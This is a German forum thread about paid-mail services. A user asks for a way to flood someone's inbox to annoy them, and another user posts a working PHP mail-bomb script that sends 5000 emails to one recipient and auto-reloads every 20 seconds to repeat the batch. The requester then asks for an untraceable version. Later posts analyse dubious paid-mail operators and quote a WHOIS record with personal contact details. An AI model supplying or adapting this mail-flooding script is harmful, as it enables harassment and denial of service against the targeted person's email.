Thema: Suche Paidmail Anbieter mit ganz vielen Emails?

NiBurhe 09.06.2006 11:27
ihrnick wrote:und ich such nu auch nen mailer mit vielen mails...
aber nach möglichkeit einen wo man net seine mail addy bestätigen muß...
will mal jemanden ärgern... ;)
Dafür braucht man doch kein Paidmailer, da nehme ich mir irgendwo kostenlosen PHP Space her und schreibe mir da ein kleines Skript und was meinste, wie schnell der sein Postfach voll hat, ist halt immer der gleiche Text. Das geht schneller.

Interesse? ^^ :twisted:


MfG
NiBurhe

S
Smily0412 09.06.2006 11:39
ihrnick wrote:gibt bestimmt irgendwo in den weiten des inets auch was dafür...
oder...
ich könnt ja mal smiley fragen... der kann doch so gut ettliche mails verschicken... *wegrofl*
(nimms mir net übel... :P)
lol
Aber NiBurhe hat recht. So ein Script kann man in wenigen Minuten machen

soundofsilence 09.06.2006 11:51
Smily0412 wrote:
ihrnick wrote:gibt bestimmt irgendwo in den weiten des inets auch was dafür...
oder...
ich könnt ja mal smiley fragen... der kann doch so gut ettliche mails verschicken... *wegrofl*
(nimms mir net übel... :P)
lol
Aber NiBurhe hat recht. So ein Script kann man in wenigen Minuten machen
VORSICHT, Script ist ultrascharf, nach 20 Sekunden wird die gleiche Menge an Mails erneut gesendet (bis du das Browserfenster zumachst!)... Selbstverständlich übernehme ich KEINE Haftung! :D
<?php
    ## Anzahl der zu versendenden Mails
    $durchlaeufe = 5000;
    
    ## Empfänger der Mails
    $empfaenger = "name@domain.tld";

    ## Betreff der Mails
    $betreff = "Betreff";

    ## Nachricht der Mails
    $nachricht = "Nachricht";

    for ($i=0; $i<$durchlaeufe; $i++) {
        mail($empfaenger,$betreff,$nachricht);
    }
?>
<html>
<script language="javascript">
var initi = window.setInterval ('downcount()', 1000);
var text = 'N&auml;chste Ladung geht ';
var zahl = 20;
var dokument="<?php echo $_SERVER[PHP_SELF]; ?>";
function downcount()
{
zeige = text + 'in ' +zahl+ ' Sekunden raus!';
window.status = zeige ;
// für den Internet Explorer
document.all['max'].innerHTML = zeige ;
// für die neuen Netscape Versionen
document.getElementById('max').innerHTML = zeige ;
zahl --;
if (zahl < 0 )
{
location.href=dokument;
}
}
</script>
<table>
<tr>
<td style="border:1px dotted green" width="200">
<div id="max">N&auml;chste Ladung geht in 20 Sekunden raus!</div>
</td>
<td style="border:1px dotted green">
<span style="font-size:10pt;horizontal-align:middle;">~~~ Nutzung auf eigene Gefahr! ~~~</span>

</td>
</tr>
<tr>
<td colspan=2>
<iframe width=930 height=420 src='http://cpanel10.myrtlenet.com/~soofsi/cswitch'></iframe>
</td>
</tr>
</table>


C
CoÐy 09.06.2006 11:53
habe ich das richtig verstanden? jemand sucht einen ami-mailer, der ganz viele mails verschickt und will damit viieeel geld verdienen :D:D:D:D
ich bon bei 3 amimailern angemeldet, bei 2 von denen verdient man am tag 1,35 $ (27 mails à 5 ct) wenn man das mit anderen deutschen vergleicht, ist das schon gut :D

NiBurhe 09.06.2006 12:00
CoÐy wrote:habe ich das richtig verstanden? jemand sucht einen ami-mailer, der ganz viele mails verschickt und will damit viieeel geld verdienen :D:D:D:D
ich bon bei 3 amimailern angemeldet, bei 2 von denen verdient man am tag 1,35 $ (27 mails à 5 ct) wenn man das mit anderen deutschen vergleicht, ist das schon gut :D
Welche sind das denn?

MfG
NiBurhe

soundofsilence 09.06.2006 12:01
CoÐy wrote:ich bon bei 3 amimailern angemeldet, bei 2 von denen verdient man am tag 1,35 $ (27 mails à 5 ct) wenn man das mit anderen deutschen vergleicht, ist das schon gut :D
Hast du schon eine AZ erhalten? Ist die AZG unrealistisch hoch? Sind die Werbepreis im Vergleich zu den Vergütungen plausibel?

Sorry, dass ich da so misstrauisch bin, aber bei den Amimailern ist 0,01 $ / Mail so ziemlich das Maximum, was seriöse zahlen.

C
CoÐy 09.06.2006 14:41
www.strongptr.com
www.american-mails.com

habe noch keine az erhalten, aber ich ich habe schon oft von den mailern gehärt und ich meine, das ich irgendow mal in so ner mailer sammeliste die gesehen habe, mit auszahluns screen ...
aber kine garantie darauf ;)

soundofsilence 09.06.2006 15:11
Also ich kann dir mit fast 100 % Garantie sagen, die werden nicht zahlen...
  • American-Mails hat knapp 16'000 Mitglieder (unrealistisch)
  • Wenn man als Sponsor eine 0,05$ - Paidmail an alle (16'000 !) Mitglieder versenden will, dann zahlt man nur 2,50 $ - Wenn nun jedem Mitglied beim Bestätigen 0,05 $ vergütet werden soll, dann kostet das den Betreiber alleine schon 800 $ (16000 * 0,05$).
  • Nächstes Beispiel: Auf der Startseite steht, jeder PTC - Klick wird mit mindestens 0,02 $ vergütet - Im Sponsorenbereich sind 1000 Klicks bereits für 1,5 $ zu haben, wenn 1000 Mitglieder einen 0,02 $ - Link klicken, dann kostet das den Betreiber 20 $.
  • Nächstes Beispiel: AZG bei 85 $ - Unrealistisch hoch, die wollen nur die leichtgläubigen Mitglieder so lange wie möglich halten. Zusätzlich kurbelt das den Verkauf von Upgraded Accts an.
Bei strongptr.com dürfte das das gleiche sein. Wenn du schon AZB gesehen hast, dann waren das höchstwahrscheinlich Fakes.
Nicht verzweifeln, wenn du bereits viel Guthaben gesammelt hast, du kannst es bestimmt in der Redemption Area auch in Werbung umwandeln lassen.

StrongPTR - Schnippsel aus dem Runner:
CashCrusader Version:1.97
Last MySQL backup from admin: 111.63 days
  • Die aktuelle CashCrusader ist 1.99, myecom rät davon ab, die vorherigen zu verwenden
  • Letztes Backup vor 111 Tagen? Vorsicht, bald löscht der Admin die DB und sagt "alles ist verlorengegangen, sorry"
  • strongptr.com scheint keine gültige Lizenz zu haben - myecom sagt "strongptr.com is NOT registered"
(Bei american-mails ist der Runner in Ordnung, letztes Backup wurde heute genommen, Version ist auch 1.99 und CC ist auch ordnungsgemäß lizenziert)

EDIT: american-mails.com WHOIS:
Registrant:
N/A
jinmin lin (wmofamerican@yahoo.com.cn)
#102,the road of tianqiao
fuzhou
Fujian,350012
CN
Tel. +86.5915163300
Sehr amerikanisch, ich muss schon sagen ;)

ihrnick 09.06.2006 17:21
mhm... wer macht mir mal sonen script und erklärt mir wie das dann genau geht?
und nach möglichkeit eins wo ich keine strafen bekomme oder so wie smiley... ;)
und möglichst auch net nachverfolgbar... ;)

soundofsilence 09.06.2006 17:24
ihrnick wrote:mhm... wer macht mir mal sonen script und erklärt mir wie das dann genau geht?
und nach möglichkeit eins wo ich keine strafen bekomme oder so wie smiley... ;)
und möglichst auch net nachverfolgbar... ;)
Ist meins nicht ausreichend dokumentiert?